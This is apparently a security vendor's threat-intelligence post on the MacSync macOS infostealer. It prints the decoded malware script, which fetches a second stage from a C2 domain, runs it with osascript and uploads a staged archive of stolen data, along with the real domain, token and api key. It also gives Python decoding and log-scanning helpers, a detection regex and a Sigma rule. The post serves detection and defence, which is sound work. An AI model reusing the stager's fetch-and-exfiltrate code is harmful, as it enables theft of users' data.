
MacSync Infostealer: An Overview of Recent macOS Threat Activity

  • Mar 11

Background

MacSync is an infostealer targeting macOS. It is a rebranded version of Mac.c that first appeared in April 2025 and is a Go‑based agent with information‑stealing and remote command‑and‑control (C2 or C&C) capabilities.


Researchers at the software company Jamf identified a new variant of MacSync delivered through a digitally signed and notarized Swift application, instead of previous tactics that relied on Click‑Fix delivery. This method marks a significant evolution, as it removes the need for direct terminal interaction and allows the malware to bypass Apple’s Gatekeeper and XProtect security controls.


Detection

The malware employs several evasion techniques, such as inflating the file size to 25.5 MB using unrelated PDF documents. It also performs various checks to avoid sandbox detection before executing an encoded payload, such as the one shown below:


/bin/zsh
d6632=$(base64 -d <<'PAYLOAD_m29866333712064'
gunzip
[Base64 blob omitted]
PAYLOAD_m29866333712064
eval "$d6632"

The payload is Base64‑encoded and compressed with gzip. The decoded payload is shown below:

#!/bin/bash
daemon_function() {
    exec </dev/null
    exec >/dev/null
    exec 2>/dev/null
    killall Terminal
    local domain="wildformx.com"
    local token="f4051bcb3f71a3579f365b79e4526a7804ded4ca597c78ac80998d641b98b79e"
    local api_key="5190ef1733183a0dc63fb623357f56d6"
    if [ $# -gt 0 ]; then
        curl -k -s --max-time 30 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" -H "api-key: $api_key" "hxxps://$domain/dynamic?txd=$token&pwd=$1" | osascript
    else
        curl -k -s --max-time 30 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" -H "api-key: $api_key" "hxxps://$domain/dynamic?txd=$token" | osascript
    fi
    if [ $? -ne 0 ]; then
        exit 1
    fi
    curl -k -X POST \
         -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" \
         -H "api-key: $api_key" \
         -H "cl: 0" \
         --max-time 300 \
         -F "file=@/tmp/osalogging.zip" \
         -F "buildtxd=$token" \
         "hxxps://$domain/gate"
    
    if [ $? -ne 0 ]; then
        exit 1
    fi
}
if daemon_function "$@" & then
    exit 0
else
    exit 1
fi

Upon execution, the malware attempts to retrieve a second‑stage payload from hxxps://$domain/dynamic?txd=$token (appending the password as the pwd parameter when the script receives an argument) and executes it using osascript, a built‑in macOS command‑line utility used to run Open Scripting Architecture (OSA) scripts. If that stage succeeds, the script uploads the archive at /tmp/osalogging.zip, presumably the data staged by the second stage, to hxxps://$domain/gate with a multipart POST that carries the same api-key header and the token as the buildtxd field.
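To triage a stager of the shape shown above without running it, the following Python helper (an added example, not code from the post, Jamf or NTT) statically decodes the Base64 heredoc, strips the optional gzip layer, and then pulls the C2 domain, txd token, api-key and expanded URLs out of the decoded script. The heredoc tag, variable name and every sample value in it are constructed stand-ins; the indicator extraction assumes the `local domain=` / `local token=` / `local api_key=` layout of the decoded payload quoted above.

```python
import base64
import gzip
import re
import textwrap
from typing import Dict, List, Optional

# Matches the stager shape seen in the post: base64 -d <<'TAG' ... TAG, with the
# Base64 text between the two tag lines. Tag and variable names are attacker-chosen.
HEREDOC_RE = re.compile(
    r"base64\s+-d\s*<<\s*'?(?P<tag>\w+)'?.*?\n"   # opening line, e.g. ... <<'PAYLOAD_x' | gunzip
    r"(?P<blob>.*?)\n"                            # the Base64 text, possibly line-wrapped
    r"(?P=tag)\s*$",                              # closing tag on its own line
    re.S | re.M,
)

GZIP_MAGIC = b"\x1f\x8b"


def extract_staged_payload(script: str) -> Optional[str]:
    """Recover the script hidden in a base64(+gzip) heredoc without eval'ing it."""
    m = HEREDOC_RE.search(script)
    if not m:
        return None
    blob = "".join(m.group("blob").split())      # drop line wrapping and whitespace
    raw = base64.b64decode(blob, validate=True)
    if raw.startswith(GZIP_MAGIC):                # the gzip layer is optional
        raw = gzip.decompress(raw)
    return raw.decode("utf-8", errors="replace")


# Assumed indicator layout, modelled on the decoded payload quoted in the post.
IOC_PATTERNS = {
    "domain":  re.compile(r'local\s+domain="([^"]+)"'),
    "token":   re.compile(r'local\s+token="([0-9a-fA-F]{64})"'),
    "api_key": re.compile(r'local\s+api_key="([^"]+)"'),
}


def extract_indicators(decoded: str) -> Dict[str, object]:
    """Pull C2 domain, txd token, api-key and expanded hxxp(s) URLs from a decoded payload."""
    found: Dict[str, object] = {}
    for name, pat in IOC_PATTERNS.items():
        hit = pat.search(decoded)
        found[name] = hit.group(1) if hit else None
    urls: List[str] = []
    for u in re.findall(r"""hxxps?://[^\s"']+""", decoded):
        # expand the two shell variables the sample uses so the URL is a usable IoC
        u = u.replace("$domain", str(found.get("domain") or "$domain"))
        u = u.replace("$token", str(found.get("token") or "$token"))
        urls.append(u)
    found["urls"] = sorted(set(urls))
    return found


# Constructed, benign stand-in for a decoded payload (reserved .invalid TLD, dummy values).
SAMPLE_DECODED = """#!/bin/bash
daemon_function() {
    local domain="c2.example.invalid"
    local token="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
    local api_key="00112233445566778899aabbccddeeff"
    curl -k -s "hxxps://$domain/dynamic?txd=$token" | cat
}
"""


def build_sample_stager() -> str:
    """Wrap SAMPLE_DECODED the way the observed stager does: gzip, then a Base64 heredoc."""
    b64 = base64.b64encode(gzip.compress(SAMPLE_DECODED.encode())).decode()
    body = "\n".join(textwrap.wrap(b64, 76))
    return (
        "#!/bin/zsh\n"
        "d6632=$(base64 -d <<'PAYLOAD_sample' | gunzip\n"
        + body + "\n"
        "PAYLOAD_sample\n"
        ")\n"
        'eval "$d6632"\n'
    )


if __name__ == "__main__":
    decoded = extract_staged_payload(build_sample_stager())
    print(decoded)
    print(extract_indicators(decoded or ""))
```

Feed `extract_staged_payload` the text of a captured wrapper script; it never executes anything, so it is safe to run on a sample in an analysis VM, and the indicators it returns can be passed straight to the detection logic described in the next section.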


A VirusTotal correlation search for the URI pattern /dynamic\?txd= returned more than 300 matches, many of which are flagged as malicious by multiple security vendors. The earliest observation dates back to 2025‑09‑20, indicating that this URI structure has been consistently used by the malware and represents a strong candidate for detection logic.


Further analysis of the txd parameter (the $token value in the script) shows that it is a 64‑character hexadecimal string. Based on this, the following regex can be used to reliably detect the malware’s URI query pattern in network traffic. Note that the leading ^ anchor requires txd to be the first query parameter, which is how the observed requests are built (the optional pwd parameter is appended after it):

^txd=[0-9a-fA-F]{64}

Sigma rule

title: Potential MacSync C2 traffic
id: 0e5690a9-8d53-45bd-b9d5-7c18bcaf1d4e
description: InfoStealer targeting macOS. Detects requests to specific URI patterns observed in recent campaign telemetry.
status: experimental
author: Amata Anantaprayoon
date: 2026-02-11
modified: 2026-02-11
logsource:
    category: proxy
detection:
    selection:
        uri_path: /dynamic
        uri_query|re: '^txd=[0-9a-fA-F]{64}'
    condition: selection
falsepositives:
    - Web application endpoints that legitimately use matching paths
level: critical
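To show what the regex and the Sigma selection above match in practice, here is an added Python check (not part of the post or of NTT's hunting engine) run over constructed proxy log lines. `matches_sigma_selection` reproduces the rule exactly (path `/dynamic` and the anchored `^txd=[0-9a-fA-F]{64}` query regex); `matches_any_position` goes slightly beyond the rule by accepting a 64‑hex txd value wherever it sits in the query string, which is an assumption about how the pattern might vary, not something the post reports. The log format, timestamps and client addresses are constructed; the domain and token are the ones quoted from the decoded payload.

```python
import re
from typing import Callable, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Regex from the post, applied to the query string as the Sigma rule does.
TXD_QUERY_RE = re.compile(r"^txd=[0-9a-fA-F]{64}")
# Whole-value check used by the broader variant.
HEX64_RE = re.compile(r"^[0-9a-fA-F]{64}$")


def matches_sigma_selection(url: str) -> bool:
    """Exact equivalent of the Sigma selection: uri_path == /dynamic AND uri_query|re."""
    parts = urlsplit(url)
    return parts.path == "/dynamic" and TXD_QUERY_RE.match(parts.query) is not None


def matches_any_position(url: str) -> bool:
    """Broader (assumed) variant: a 64-hex txd value anywhere in the query of /dynamic."""
    parts = urlsplit(url)
    if parts.path != "/dynamic":
        return False
    return any(HEX64_RE.match(v) for v in parse_qs(parts.query).get("txd", []))


# Constructed proxy log: "<timestamp> <client_ip> <method> <url> <status>" per line.
# Lines 1-2 mimic the observed beacon; 3-4 are benign look-alikes; 5 reorders the params.
SAMPLE_PROXY_LOG = """\
2026-02-11T09:14:02Z 10.20.30.41 GET hxxps://wildformx.com/dynamic?txd=f4051bcb3f71a3579f365b79e4526a7804ded4ca597c78ac80998d641b98b79e 200
2026-02-11T09:14:05Z 10.20.30.41 GET hxxps://wildformx.com/dynamic?txd=f4051bcb3f71a3579f365b79e4526a7804ded4ca597c78ac80998d641b98b79e&pwd=REDACTED 200
2026-02-11T09:15:10Z 10.20.30.52 GET https://intranet.example.invalid/dynamic?txd=deadbeef 200
2026-02-11T09:16:00Z 10.20.30.52 GET https://www.example.invalid/search?q=txd 200
2026-02-11T09:17:30Z 10.20.30.60 GET https://cdn.example.invalid/dynamic?v=3&txd=F4051BCB3F71A3579F365B79E4526A7804DED4CA597C78AC80998D641B98B79E 304
"""


def scan_proxy_log(log_text: str, relaxed: bool = False) -> List[Tuple[int, str, str]]:
    """Return (line_no, client_ip, url) for every line the chosen check flags."""
    check: Callable[[str], bool] = matches_any_position if relaxed else matches_sigma_selection
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 5:
            continue                      # skip malformed lines rather than crash
        _ts, client_ip, _method, url, _status = fields[:5]
        if check(url):
            hits.append((lineno, client_ip, url))
    return hits


if __name__ == "__main__":
    for lineno, ip, url in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"ALERT line {lineno}: {ip} -> {url}")
    print("relaxed variant flags lines:",
          [h[0] for h in scan_proxy_log(SAMPLE_PROXY_LOG, relaxed=True)])
```

Run against the constructed log, the exact rule flags lines 1 and 2 (the beacon with and without the pwd parameter) and ignores the short-token and unrelated-path lines; only the broader variant also catches line 5, where txd is not the first parameter. That difference is worth keeping in mind when tuning the rule for a proxy that normalises or reorders query strings.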

How NTT Security Protects Against MacSync

  • NTT has created a hunting query to identify the malware’s command‑and‑control (C2) servers using VirusTotal intelligence. Newly discovered C2 servers are automatically added to NTT’s internal threat list. Any network traffic directed toward these servers triggers an alert to the SOC for immediate review.


  • A Sigma rule reflecting the MacSync C2 pattern has been deployed within NTT’s threat‑hunting engine. If network activity matches this behavior, the engine generates a notification to the SOC, enabling rapid investigation and response.

